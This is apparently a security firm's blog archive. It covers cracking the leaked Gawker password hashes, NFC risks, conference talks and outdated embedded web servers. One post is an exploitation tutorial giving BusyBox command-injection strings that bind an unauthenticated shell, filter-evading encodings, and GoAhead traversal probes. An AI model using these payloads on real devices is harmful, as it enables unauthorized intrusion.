Category Archives: Techno
When I heard about Gawker getting compromised, I knew it was not going to be pretty, particularly with regard to their password database. Once again, the ugly warts of shared-secret authentication systems are in the headlines. We got our hands on a copy of the password database. For reasons only Gawker's administrators know at this point, the database contains only traditional DES crypt-style hashes (yes, that DES). Ideally, every password for a web application user is stored using a random salt per password (at least 4 bytes for good measure) and a safe hash algorithm, like SHA1. That's it. (See the end of this post for a better recommendation that should be considered the end goal.) Storing passwords securely is not difficult; you just have to know what to do and believe it is important enough to do it. What you are about to read would not be possible if this simple guideline had been followed.
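That guideline, sketched in Python (an illustration of per-password salting, not Gawker's code):

```python
import hashlib
import os

def hash_password(password: str) -> str:
    """Hash a password with a random per-password salt (illustrative sketch)."""
    salt = os.urandom(4)  # at least 4 random bytes of salt per password
    digest = hashlib.sha1(salt + password.encode("utf-8")).hexdigest()
    return salt.hex() + "$" + digest

def verify_password(password: str, stored: str) -> bool:
    """Recompute the salted hash and compare against the stored value."""
    salt_hex, digest = stored.split("$")
    salt = bytes.fromhex(salt_hex)
    return hashlib.sha1(salt + password.encode("utf-8")).hexdigest() == digest
```

Because the salt is random, two users with the same password end up with different stored hashes, which is exactly what defeats the precomputed lookup tables attackers love.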
There are a few lessons we can learn from this that I think are instructive for anyone that has to store user passwords and authenticate users:
- The top 100 passwords you NEVER want to allow your users to select.
- How to properly store passwords and how to construct a password policy.
First, the technical details of how we proceeded: I have about 14-16 cores I can dedicate to password cracking, spread across about six machines. They are all fairly beefy, but not crazy. The challenge this presents is parallelizing the whole process across the network. This is where John the Ripper with the MPI patch comes in. MPI allows John to distribute the work to a large number of disparate systems, which has the advantage that any old hardware can be plugged in for the task. Each cracking node runs a daemon or agent that communicates with one central node coordinating the cracking effort.
Setting all of this up requires a bit of effort, but it is not the most difficult task. Once a john --test kicks off properly (as shown below), we are off to the races with our 14 cracking nodes.
mpiexec -machinefile machines -n 14 ./john --test
Benchmarking: Traditional DES [128/128 BS SSE2-16]... DONE
Many salts:    33099K c/s real, 35460K c/s virtual
Only one salt: 28179K c/s real, 30031K c/s virtual
Password cracking of this nature is an embarrassingly parallel problem to solve. My crack nodes were sending a few hundred bytes per second to each other to handle the overhead of coordinating the cracking efforts. In a couple hours of cracking we were able to crack about 160,000 passwords:
166166 password hashes cracked, 581986 left
This means approximately 22% of the passwords were recovered in short order. All of these users who reuse passwords are now at severe risk. Additionally, time and time again, the #1 worst password is "123456", by a wide margin. Taking out my copy of the book "Perfect Passwords" and pulling up their top 500 worst passwords of all time shows the following as the 10 worst:
Perfect Passwords Top 11
123456
password
12345678
1234
pussy
12345
dragon
qwerty
696969
mustang
letmein
OK, so I cheated; that is actually 11 passwords. Now, here are the top 11 from the Gawker dump (the number on the left is the number of occurrences):
Gawker Top 11
4162 123456
3332 password
1444 12345678
861 lifehack
765 qwerty
529 abc123
503 12345
471 monkey
439 111111
410 consumer
391 letmein
Notice that number 11 is exactly the same? And that numbers 1, 2, and 3 are exactly the same? This keeps happening, over and over. The old saying "creatures of habit" comes to mind. We are letting our users down by letting them pick these passwords. We are also letting our users down by not protecting their secrets better.
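Reproducing a tally like the one above from a list of recovered plaintexts takes only a few lines; a sketch, with toy data standing in for the real dump:

```python
from collections import Counter

def top_passwords(cracked, n=11):
    """Tally recovered plaintexts and return the n most common with counts."""
    return Counter(cracked).most_common(n)

# Toy data standing in for the recovered plaintexts:
sample = ["123456"] * 4 + ["password"] * 3 + ["letmein"] * 2 + ["monkey"]
for pw, count in top_passwords(sample, 3):
    print(count, pw)
# → 4 123456
#   3 password
#   2 letmein
```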
I could dig into the statistics and interesting features of these passwords (and there is a lot to dig into here), but the real lesson here is that you should never store passwords in a format this easy to crack. If you have a pile of passwords stored like this, you need to run, not walk, to the design board and find a way to fix it ASAP. Also, consider disallowing users from picking any password in the Gawker password database. Every last one of them can be recovered. Don't let your users use a single one of those!
A few updates: WSJ has good coverage of this topic as well.
Also, our suggestion at the top for password storage is a bare-minimum recommendation. You should be using something like bcrypt, which is several orders of magnitude more difficult to crack. Another option is to roll your own, but you really should not. The key idea is that you need something that takes a lot of time for a computer: 100-300 milliseconds on your hardware, depending on the time vs. performance trade-offs you can tolerate. Even 10ms is better than a few microseconds. There are several schemes to do this; they generally repeat multiple rounds of their core algorithm (something that really mixes the data up), making password recovery very slow by forcing an attacker to perform an expensive operation a variable number of times for just one candidate password attempt. Read this article on Unix crypt and then read this article to become even better informed.
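For a standard-library sketch of that slow-down idea (PBKDF2 rather than bcrypt; tune the iteration count until a single hash takes 100-300 ms on your own hardware):

```python
import hashlib
import os

def slow_hash(password: str, salt: bytes, iterations: int = 100_000) -> bytes:
    """Key-stretched hash: every guess costs the attacker `iterations` rounds."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)

# Verification repeats the same work using the stored salt and iteration count,
# so the cost lands on the attacker for every candidate password:
salt = os.urandom(16)
stored = slow_hash("correct horse", salt)
assert slow_hash("correct horse", salt) == stored
```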
That is it for now, thanks to fellow Intrepidus consultant Jason Ross for doing some of this footwork!
Answer: …at the end of this post.
There has been a great deal of buzz about "contactless shopping" being enabled in the next generation of cell phones here in the United States. Google will be including APIs for this in Android 2.3 "Gingerbread" and rumors are it will be in the iPhone 5. The technology used is called "Near Field Communication" (NFC), which is an extension of ISO/IEC 14443 (proximity cards… like the badge you probably have to use to get into your office). On the techie side, these devices operate at 13.56 MHz and communicate via magnetic field induction, which should give a range of up to 10 or 20 centimeters… more on that later.
The main way we will probably see NFC used is to enable phones to interact with physical tags (passive) or readers (active) when your phone comes within the few-centimeter range. These passive tags could ask your phone to perform a task like launching a URL, sending an SMS message, storing a contact, or anything else you can communicate in a few kilobytes of data. If you tap on an active reader, it may try to use peer-to-peer mode and create a bidirectional communication channel. It might then try to have you interact with a custom application on your device, or even ask your device to send data back. The way NFC has been implemented in previous mobile phones, the phone's NFC reader is always active unless the phone is in a standby or airplane-type mode.
The wireless protocol itself is not encrypted, so the communication is susceptible to eavesdropping, and then replay attacks, by other nearby devices. There has been discussion about how to add encryption, but this is not currently part of the standard. You can also introduce rogue tags and readers; however, there is an NFC Signature specification for NFC Data Exchange Format (NDEF) records which tries to address this issue. Unfortunately, the specification does not address the public key infrastructure (PKI) behind this or the certificate verification and revocation process. You may be interested in some real-world fun Collin Mulliner has had with passive tag spoofing and NFC device fuzzing.
So a large part of NFC security will come down to the range at which the device can be used. Immediately I wondered how much of the previous RFID extended-range research from people like Chris Paget would apply here. One of the key things to keep in mind is that the NFC spec operates at 13.56 MHz and in a slightly different way than the 900 MHz RFID protocols. The 900 MHz type of RFID communicates information using backscatter (and from tag to reader only). The NFC spec uses induction to modulate a signal, thereby communicating data back to the host. Because the NFC circuit needs to be powered, the read range is greatly reduced. The RF power which reaches the tag drops off by approximately the distance squared. The read range of the NFC spec is up to 10-20 cm, whereas the read range of 900 MHz spectrum RFID tags has been pushed to hundreds of meters. However, it is possible to eavesdrop on NFC communication at a greater distance. The distance depends on several factors (including the power transmitted by the NFC reader, the characteristics of the eavesdropping antenna, and the material between the eavesdropper and the legitimate transaction), but is on the order of 1 meter for passive tags.
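To put that distance-squared approximation in rough numbers (a back-of-the-envelope sketch using only the approximation stated above, not a field measurement):

```python
def relative_power(d_near: float, d_far: float) -> float:
    """Relative RF power between two distances, assuming power ~ 1/distance^2."""
    return (d_near / d_far) ** 2

# Moving a reader from 10 cm out to 1 m cuts the power reaching the tag
# by a factor of roughly 100, which is why the legitimate read range is so short:
print(relative_power(0.10, 1.0))  # roughly 0.01
```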
Are we going to need faraday caged cell phone holsters to stop people from pulling out our credit card data when we’re packed tightly on a subway ride? Hopefully not, but that’s going to depend on how mobile applications and operating systems are written to handle NFC.
History Answer: George Santayana and the saying: “Those who cannot remember the past are condemned to repeat it.”
- benn, higb, and mxs
I was aiming not to be the last contributor to this series, given that I’ve already received my proper lashings for slagging on posts as is. But, here’s my attempt at summarizing my experience in Las Vegas for BlackHat USA 2010, DEFCON 18, and the second Security B-Sides Las Vegas. I’ll scribble here what I can actually remember amidst the scorching blaze that is Vegas during the day, and the tiring, mind-scrambling, party-filled nights.
I actually caught the "System DNS Vulnerabilities and Risk Management" panel during the first day of BlackHat. Admittedly, I was expecting something beyond trumpeting about DNSSEC, though that's…effectively…what the description of the panel was. *sigh* Anyway, the panelists explained the progress made with DNSSEC, explained some of the timelines for signing additional TLDs, what [we] should be on the lookout for, and even took a few good questions. One of the more intriguing inquiries from the audience centered around emulating root nameservers in a completely isolated test lab. I wish I could recall what the exact response was, but that was right at the tail end of the panel and people were shuffling out. All in all, an 'okay' session. (Really, though <fanboi> I just wanted to hear more from Whitfield Diffie </fanboi>.)
I also attended "These Aren't the Permissions You're Looking For", presented by my pal Anthony Lineberry and his cohorts at Lookout, David Luke Richardson and Tim Wyatt. As someone who spends quite a bit of time on the Android platform, this session piqued my interest. I expected the usual rigmarole: introduce Android, the security model, how permissions work, message passing, etc., and I was on target. That part of the talk was very familiar to me, so I nodded along in step. Eventually, the talk shifted gears, discussing how applications can sidestep requesting certain permissions (such as fine-grained / GPS location data) simply by scraping those data from the logs, which requires only the READ_LOGS permission (as my colleague, Corey, said in a previous blog post). Additionally, they discussed a means of exfiltrating certain data with zero permissions: simply invoking the web browser (via an Intent), pointing to an attacker-controlled web server, and sending device information and, in a few special cases, location data (IIRC, this was due to an issue in a third-party app).
The third, and final, talk I attended at Black Hat was “Harder, Better, Faster, Stronger: Semi-Auto Vulnerability Research” by Lurene Grenier (a.k.a. “pusscat”) and Richard Johnson. While certainly a bit dry to most of the audience (and even to me in a few spots), I was pretty excited about the concepts presented. The presenters basically laid out a workflow for finding, logging, archiving, and triaging bugs, and re-evaluating previously discovered bugs — constantly (in fact, one of the ideas presented was “constantly fuzzing”). Much emphasis was given to post-processing of bugs discovered during, say, the fuzzing process. Richard Johnson also presented a set of tools, including one called “MoFlow” (IIRC, and that actually may have been the collective name), to help assist this process. Pusscat also showed off, briefly, a snapshot of a web interface that controlled and monitored distributed fuzzing/test processes. Cool stuff.
Security B-Sides Las Vegas
I didn’t actually attend the second day of BlackHat, but instead headed over to 2810 East Quail Ave., where lies a beautiful estate (with a gajillion [yes, a gajillion] pools). It also happened to be the venue for Security B-Sides Las Vegas. Surrounded by a ton of familiar faces, food, beer, and other refreshments, I chilled out for a bit before giving my own presentation, “It Melts In Your Hand: An Overview of Security (Failures) In Mobile Applications”. Through the nebulous haze of sleep deprivation, I managed to pull it off well enough (I think), and even answered some questions in a mildly coherent manner. After that, it was back to Caesars Palace to prepare for the Security Twits party.
Admittedly, my colleagues have done a better job of summarizing DEFCON than I can at this point. I spent most of my time in the “hallway track”, chatting up friends, old and new, about a myriad of things, ranging from hacking to Club Mate (blah). Also, I spent an inordinate amount of time getting my butt kicked in the Ninja Networks badge “game”. Notice I’m still a Level 1.
On the final day of DEFCON, I did manage to attend a panel about…wait for it…PCI. Yes. A PCI panel at DEFCON. And wouldn’t ya know it, it was packed. The panelists focused mainly on the pain points of PCI, the numerous misinterpretations and sheer laziness by merchants and service providers, and how we can all hope to effect change. Incidentally, the Q&A session following the panel, while in a smaller room (still packed, of course) was even more emotionally charged and powerful than the panel itself.
Here’s to more hax, more partying, and maybe even a bit of recovery.
Zach at the Adobe Haters Ball (photo by Stephen Ridley)
Hey, this is Max Sobell and I’ve been interning with Intrepidus Group this past summer. I just got back from my first Blackhat/Defcon with IG a few days ago. Corey summed up quite a few of the really good talks but there was one more that was particularly interesting. The WiMAX Hacking (https://groups.google.com/group/wimax-hacking) talk, from Pierce, Goldy, and aSmig feat. sanitybit was great.
For those of you who aren't familiar with WiMAX, it's a wireless broadband technology being deployed (and spreading rapidly) by Clearwire (and others, though Clearwire has the largest network). The team's research was done on the Clear network, which Time Warner, Comcast, and Sprint all re-brand, though it is the same physical network. One thing I really liked in the talk was the emphasis on the hardware hacks and jailbreaks. They combined some hardware hacking with some VPN tricks to own a couple of WiMAX devices and the captive portal page. The team was able to send fragmented packets through OpenVPN on UDP/53 without actually logging into the portal, getting free WiMAX. Unfortunately, the downside is that the Location Based Services (LBS) from Clearwire (currently not very accurate, and they can't be turned off) allow anyone bumming off the network to be tracked down by fellow users via a development key. One thing that confused the audience was that the speakers didn't qualify what they meant by LBS. In the context of their talk, they meant traditional signal-strength analysis and antenna orientation. What was not mentioned is that these 4G WiMAX cellular radios also have a real GPS radio, which is a requirement of E911. I would assume that the carrier has the ability to locate a device within meters based on the GPS radio.
Friday morning Corey, Mike, and I played in the Hack Cup soccer games on the Goal++ team along with DC Campbell, DC’s friend Judd, and Adam Pridgen. We sustained some early injuries, which left Mike scooting around the Riviera for the rest of the week in a motorized cart, but made it to the semi-finals with no subs. Unfortunately after that we had to stop playing because we lost DC to the airport and Judd had to go back to work. But watch out next year, Goal++ will be back! A big thanks to Nico Waisman for organizing the tournament and to Immunity for sponsoring it.
That’s it from me!
Can you tell if a host is remotely infected just by a single HTTP request? For some malware the answer is yes.
By now, I think our readers are pretty familiar with PhishMe. As you can imagine, we see a lot of hits to PhishMe from a variety of browsers. And even better, we see a lot of hits to PhishMe from a variety of browsers where the user is likely to click on things. Each time a user requests a website, the user's browser sends a "user-agent" string to the web server as part of the request. A simple user-agent string looks like:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Here's a quick breakdown of what this string tells us. The Mozilla/4.0 portion indicates a Mozilla-compatible browser. This user is running Internet Explorer 7.0 on Windows NT 5.1 (Windows XP). You can check your user-agent here.
Now for Internet Explorer, it’s pretty easy to append information to this user-agent string by editing the registry. You will typically see a number of .NET related items coming from a normal user-agent header on a Windows system.
Where it gets interesting is when we see user-agents like these next ones. It seems that some viruses and malware (or "potentially unwanted software") insert their name or a token into the user-agent string. Here are some examples we found:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; PeoplePal 7.0; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
If the malware instead appends a token to the user-agent string, this token could be used to track the user from site to site or to trigger certain behavior on malicious websites. We identified several pieces of potentially unwanted software and tallied the number of infected users using PhishMe. The graph below shows the most common pieces of malware found in user-agent strings:
We looked at IE 6, 7, and 8. Using this total number of "infected" users, we broke the infections down by browser version and divided by the total number of users running each version to get the percentage of each version's population that is infected. As it turns out, the proportion of infections is pretty similar across all IE versions. Isn't IE 8 supposed to protect users much more than IE 6? This is a bit of a surprise, but it suggests something we've known about the current state of attacks: you can have strong software controls, but security still depends just as much on the user operating the software safely. Even given a browser that is relatively hardened against threats, users must know how to identify sites with malware and phishing schemes in order to stay safe. Patching and updates are important, but so is user awareness.
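A sketch of the kind of tally behind that breakdown (the token list is taken from the examples above; our actual matching logic may have differed):

```python
from collections import Counter

# Tokens observed in the user-agent examples above
SUSPECT_TOKENS = ["AntivirXP08", "PeoplePal", "FunWebProducts"]

def tally_infections(user_agents):
    """Count how many user-agent strings carry each suspect token."""
    counts = Counter()
    for ua in user_agents:
        for token in SUSPECT_TOKENS:
            if token in ua:
                counts[token] += 1
    return counts

logs = [
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; PeoplePal 7.0)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
]
print(tally_infections(logs))
# → Counter({'AntivirXP08': 1, 'PeoplePal': 1})
```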
PhishMe clients can contact our support team for an analysis of your user base.
Meet my new favorite web server, the GoAhead WebServer. We've been playing around with a handful of embedded devices recently, and most developers now give you some sort of web interface to configure them through. It turns out we've been seeing a lot of them running GoAhead's web server, which hasn't had an official update from the vendor since 2003. This tiny guy is written in C and the source code is downloadable (although you do need a license).
While some vendors have heavily customized the server, others run it fairly as-is, just adding their own Active Server Pages (ASP). What is interesting from a security standpoint is that a number of recent devices we've seen are still using old versions of the web server. These old versions include vulnerabilities like "%5C" directory traversal attacks and changing the file extension of a request from ".asp" to ".as%70" to view the server-side source. DoS attacks are likely to work (although I think that can be a difficult issue for any embedded web server), and you are also likely to find CSRF attacks against the applications running on this web server, since developers need to roll their own mitigation for it. Here's a link to the release notes with security fixes from the latest version of the GoAhead WebServer, updated December 2, 2003.
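As a hedged sketch of probing for those two old bugs (the device address and page name are hypothetical, only the candidate URLs are built here, and actually sending them belongs on devices you're authorized to test):

```python
def goahead_probes(base_url: str, asp_page: str = "config.asp"):
    """Build candidate URLs for the %5C traversal and .as%70 source-disclosure bugs."""
    return [
        # Backslash-encoded directory traversal out of the web root
        base_url + "/..%5C..%5C..%5Cetc%5Cpasswd",
        # Mangled extension so the server serves the ASP source instead of running it
        base_url + "/" + asp_page.replace(".asp", ".as%70"),
    ]

for url in goahead_probes("http://192.168.1.1"):
    print(url)
```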
We are all aware how important patching systems can be. My home NAS device got a firmware update a few months ago that I applied. However, even though it’s up-to-date with my vendor, it’s still vulnerable to some issues which are over six years old because they haven’t patched the code from their vendor. So take a look at your embedded device and don’t be afraid to lob some 2003 sauce at them. You might find that it still works.
If you haven't been over to XKCD to see their new shell, go check it out:
guest@xkcd:/$ vi
You should really use emacs.
guest@xkcd:/$ WHAT
Unrecognized command.
guest@xkcd:/$ rm -Rf /
guest@xkcd:/$ woo
Unrecognized command.
guest@xkcd:/$ su
God mode activated. Remember, with great power comes great ... aw, screw it, go have fun.
Or rather, experiencing the consequences… that can inspire change. A perfect example: most people I know who are serious and disciplined about regular system backups do it because they've been burned in the past. (I've been very good about it ever since I paid Ontrack 1400 dollars to recover an IBM Deathstar hard drive.)
How was your weekend? Mine was ok, except I spent a good part of my Sunday helping a teenage family member re-image her laptop after it was infected by some variant of the classic “pay us money to clean the virus off your computer” (see fake Security Essentials post here: http://blogs.technet.com/mmpc/archive/2010/02/24/if-it-calls-itself-security-essentials-2010-then-it-s-possibly-fake-innit.aspx ) This is nothing that we are not all familiar with.
The fallen laptop:
Vista Home 32bit, running as Administrator, expired Norton suite.
The Ah-Ha moment for me:
She wasn't too upset about this. She needed a Word doc for homework, but could hardly take a break from texting while I was trying to find out what other important things she needed from the laptop.
Pictures? Picasa and Facebook. Email? Gmail. Music? Already on her iPod. Docs? Maybe she will use Google Docs from now on. SSH and PGP keys? (yeah right!) For her, a laptop is just a bridge to the Internet. Who cares about what is on the laptop? It's just a thing that gets you to the <cringe> cloud </cringe>. Is recovering your computer from the system disc every six months just the new norm?
She will be entering the workforce and on your corporate network in 2014.
The number of Linux-powered devices on the market is exploding. As this CCC paper points out, Linux is finding its way into everything – GPS units, television set tops, phones, routers, the works. That leaves a lot of hacking to be done, and this last month I got to spend some time with Intrepidus jailbreaking and exploiting some embedded devices. One big surprise I encountered was the difficulty of landing even simple command-injection vulnerabilities on embedded Linux.
I can’t believe it’s not Linux
The big problem with a lot of embedded Linux devices is they’re not really running Linux. If you haven’t heard of Busybox before, it’s the core functionality of Linux condensed into a single multi-call binary. Busybox offers embedded device developers a simple distribution of Linux without the large filesize footprint and complexity of porting a full Linux toolchain to embedded hardware. From a hacker’s perspective, an embedded Busybox install can pose some unique challenges, especially if you’re throwing your exploit “blind”, without the ability to see error messages:
- busybox’s ash shell lacks the full functionality of bash and other shells
- busybox’s available functionality depends on compile options chosen by the developers, so every device has the potential to pose unique challenges
- busybox’s implementation of most commands has slightly different functionality and different command line flags than the corresponding Linux versions
- Standard pipe-redirect callback shells often fail; in fact, I’ve never gotten a standard two-window “telnet | ash | telnet” shell to work on busybox.
What’s Command Injection?
Command injection vulnerabilities are usually some of the simplest exploits to land, requiring no assembly and only a little shell knowledge. They can occur whenever developers use user-supplied data as an argument to a shell command. This can happen in a number of ways, and writing a complete reference on all the ways this type of bug can manifest itself is a large topic; OWASP has a good writeup on programmatic (system call) command injection. This writeup isn’t about how injection works; it’s about how you can exploit injection on busybox. Here’s where things get weird.
BusyBox v1.1.3 Built-in shell (ash)
Enter ‘help’ for a list of built-in commands.
~ $ ping 127.0.0.1
ping: permission denied. (are you root?)
Busybox isn’t quite Linux! If you are attempting to find or exploit a “blind” command injection vuln and the target process is not a superuser process, using ping to “beacon” out to your attack box won’t work, because on busybox ping requires superuser privs. Telnet is a better beacon choice, as it is part of the default build process and must be manually removed.
Chaining Commands: Nothing New Here
The basics of adding execution to an input argument don’t change much with busybox’s shell:
~ $ true;echo Execution
Execution
~ $ false;echo Execution
Execution
~ $ true|echo Execution
Execution
~ $ false|echo Execution
Execution
~ $ false||echo Execution
Execution
~ $ true&&echo Execution
Execution
~ $ echo `echo Execution`
Execution
~ $ echo $(echo Execution)
Execution
The absolute easiest way to get access to a busybox install via command injection is telnetd. Busybox's telnetd is different: on a normal telnetd install, the "-l" flag enables line mode, but on busybox, -l specifies the command used to challenge the user. That means if you specify the busybox shell, you get a shell without a user/pass prompt:

telnetd -l/bin/sh

That's the shortest possible string that can land a shell on a busybox system. Of course, here's where things get tricky. If telnet is already open, this will fail; it will also fail to bind a privileged port when run as a non-root user. Finally, if the environment does not contain a valid PATH value, the command will fail.

/bin/busybox telnetd -l/bin/sh -p9999

The command above will bind a telnet shell to port 9999 without needing a PATH value and without running as root. Of course, now things get difficult.
Sample exploit conditions are always easy to land and never have anything annoying in the way, like character filters or buffer lengths. The real world is different; exploitation often requires circumventing limitations. As far as length goes, the commands above pretty much cover the shortest possible exploit strings. Character set limitations are a different story. Embedded device character set limitations can be pretty heavy duty, enforced by on-screen keyboards, security character filters, and other methods. A common limitation is a space-bounded copy, generated by a tokenizer that clips a supplied argument to everything up to the first instance of whitespace. Here are some ways to work around these limitations:
~ $ echo -e \\x7c\\x7c\\x2e
||.
~ $ printf \\x7c\\x2e\\x0a
|.
Busybox supports evaluation of backslash-escaped characters using both echo and the shell builtin printf. This can be used to encode a lot of the characters that are often stripped. Different execution methods require different levels of escaping. Here are some combinations that work; note that I have included the command "true" to show where a successful system command would lie in the overall exploit.
true|/bin/busybox telnetd -l/bin/sh -p9999 # Character set required: -/
true|eval $(printf telnetd\\x20\\x2dl\\x2fbin\\x2fsh\\x20\\x2dp9999)
# Character set required: $()\
true|eval `printf telnetd\\\\x20\\\\x2dl\\\\x2fbin\\\\x2fsh\\\\x20\\\\x2dp9999`
# Character set required: `\
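Hand-assembling those escape sequences is error-prone. Here's a small helper of my own (not from the original toolchain) that encodes filtered characters as \xNN escapes for busybox's echo -e / printf:

```python
def hex_escape(payload: str, chars_to_encode: str = " |/-") -> str:
    """Replace filtered characters with \\xNN escapes for busybox echo -e / printf."""
    out = []
    for ch in payload:
        if ch in chars_to_encode:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)

# Encode the telnetd one-liner so it survives a space/slash/dash/pipe filter:
print(hex_escape("telnetd -l/bin/sh -p9999"))
# → telnetd\x20\x2dl\x2fbin\x2fsh\x20\x2dp9999
```

Adjust chars_to_encode to whatever the target's filter actually strips.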
If you’re attempting to jailbreak a potential busybox device, and you’re fuzzing a net-facing service, the strings above coupled with a good [&& / || / | / ; / $() / ``] regular expression should get you started; just monitor port 9999. If you manage to land on a device with the methods I’ve listed here, drop me a line and let me know how it went down. If you’re determined to drop a binary on the device a few bytes at a time, this should get you started:
eval echo -n $(echo -e -n \\xde\\xad\\xbe\\xef $(printf \\x3e\\x3e\\x2ftmp\\x2fig))
Notes on Other Exploit Methods
There are plenty of ways to get onto a Unix-based system like busybox other than binding a shell; however, embedded devices often have unique restrictions. Concatenating a user you control onto /etc/passwd can silently fail on a read-only filesystem, a very common occurrence on embedded devices. Concatenating binaries from the shell requires precise knowledge of the target architecture. And when you're jailbreaking, failure is almost universally silent. Good luck,
several members of the Intrepidus team contributed to the technical content of this post: cbenn, 0xD1AB10, the rhodes
The OpenMoko project ( http://www.openmoko.org ) has "freed" the cell phone. OpenMoko is an open development platform with complete hardware specs (as complete as possible) that runs Linux, can be recompiled from scratch from source code, and operates as a normal "unlocked" cellular device. This news isn't new, but it is the first time I'm writing about it. The OpenMoko team actually released the second version of the cell phone hardware earlier this month (called GTA02, but nothing to do with the video game), with some significant new features including WiFi and accelerometers.
If you are like me, then you remember seeing the word “linux” in the hallowed directory listings of ftp.cdrom.com circa 1994 and thinking… hey what’s this new word? A few hours/days later, after borrowing a laptop from the school A/V department, getting comfy trashing the existing operating system fdisk style and loading slackware from a lot of floppy disks, you were greeted by a fully-bootable operating system that measured its speed in BogoMips and could do most of the things the computers in the Sun lab could do except that you were root (legitimately).
So now we've had Linux for a while; it's used all over the place and is a system that people seem to have gotten pretty comfortable with. This level of ease and comfort is now available in the form of "the device you take with you everywhere"… your cell phone is now just a little Linux box. Why is this cool? Because now I can talk to my friends and ssh into my server from my cell phone (or vice versa). Oh yeah, and do all that other stuff that Linux does, like run Apache, FTP, NFS, torrent, or scan your systems with Nessus (theoretically).
The OpenMoko project has already suffered/gained from the normal Linux way of things and there are a few different distributions available. Developers being the way they are have splintered off from the official OpenMoko distribution and created their own distros already. One in particular, an “Underground” distro has even gone so far as to scrap X11 for windowing and use the framebuffer directly. The wheel gets reinvented once again. Hopefully this time with built-in battery powered spinners.
There are numerous ways this little toy could be used by security testers. Since it has WiFi and can also use the GSM networks (AT&T and T-Mobile work OK in the States), this would make a nice little remote-access device. All you need to do is leave it in the proximity of a location with WiFi, then dial in (pppd) from across the world or anywhere cellular data connections can go (if you don't like the idea of being in physical proximity to your targets, or aren't good at talking to beefy security guards who wonder why your laptop is beeping). Alternatively, since it has USB, plug it into a corporate computer, then dial in from the cellular side and route through the newly-befriended corporate system. The possibilities here are numerous. GPS-activated, bluetooth-aware, motion-detecting WiFi/GPRS connection machine…
All in all, a cool device. Stay tuned for fun stuff to do with it.